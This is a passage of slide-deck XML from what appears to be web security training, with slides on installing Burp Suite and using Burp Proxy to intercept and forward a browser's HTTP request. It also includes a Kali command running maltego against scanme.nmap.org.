              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="340000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="5C5C5B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="694" name="Google Shape;694;p105"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175653" y="1989469"/>
            <a:ext cx="7018669" cy="258588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106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232375" y="185098"/>
            <a:ext cx="64581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Install Burp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="701" name="Google Shape;701;p106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849013" y="1026544"/>
            <a:ext cx="5824526" cy="38743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07"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232375" y="185098"/>
            <a:ext cx="64581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Install Burp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="708" name="Google Shape;708;p107"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1849013" y="1026544"/>
            <a:ext cx="5824526" cy="38743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08"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2232375" y="185098"/>
            <a:ext cx="6458100" cy="9699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r>
              <a:rPr lang="en"/>
              <a:t>Install Burp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="715" name="Google Shape;715;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764094" y="929475"/>
            <a:ext cx="5135522" cy="42140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09"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1661925" y="573281"/>
            <a:ext cx="7242000" cy="9699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131250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="720"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Intercept HTTP traffic with Burp Proxy</a:t>
            </a:r>
            <a:endParaRPr sz="3400" b="1">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Google Shape;722;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385763" y="1234440"/>
            <a:ext cx="6086400" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-311150" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Burp Proxy allows us to intercept HTTP requests and responses sent between our browser and the target server.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-311150" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This enables us to study how the website behaves when we perform different actions.</a:t>
            </a:r>
            <a:endParaRPr sz="23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10"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="29629"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 1: Launch Burp's embedded browser</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;p110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623531" y="1124295"/>
            <a:ext cx="8115300" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Go to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Proxy &gt; Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> tab and click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Open Browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. This launches Burp's embedded Chromium browser, which is preconfigured to work with Burp right out of the box.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="166666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="730" name="Google Shape;730;p110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224669" y="2150260"/>
            <a:ext cx="5786438" cy="299323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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Google Shape;242;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1617175"/>
            <a:ext cx="9144000" cy="29517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11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918544" y="221492"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="720"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 2: Intercept a request</a:t>
            </a:r>
            <a:endParaRPr sz="3400" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647794" y="1191248"/>
            <a:ext cx="8115300" cy="1314000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In Burp, notice that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Intercept is on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> button is selected.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="738" name="Google Shape;738;p111"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512319" y="1661925"/>
            <a:ext cx="7185451" cy="298419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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918544" y="221492"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="44117"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 2: Intercept a request</a:t>
            </a:r>
            <a:endParaRPr sz="3400" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p112"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647775" y="900117"/>
            <a:ext cx="8115300" cy="1314000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Using the embedded browser, try to visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://portswigger.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> and observe that the site doesn't load. Burp Proxy has intercepted the HTTP request that was issued by the browser before it could reach the server. You can see this intercepted request on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Proxy &gt; Intercept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> tab.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746" name="Google Shape;746;p112"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1989469"/>
            <a:ext cx="8874693" cy="3016088"/>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13"/>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145454"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="720"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600" b="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Step 3: Forward the request</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="50000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p113"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="929239"/>
            <a:ext cx="8115300" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="5C5C5B"/>
                </a:solidFill>
                <a:highlight>
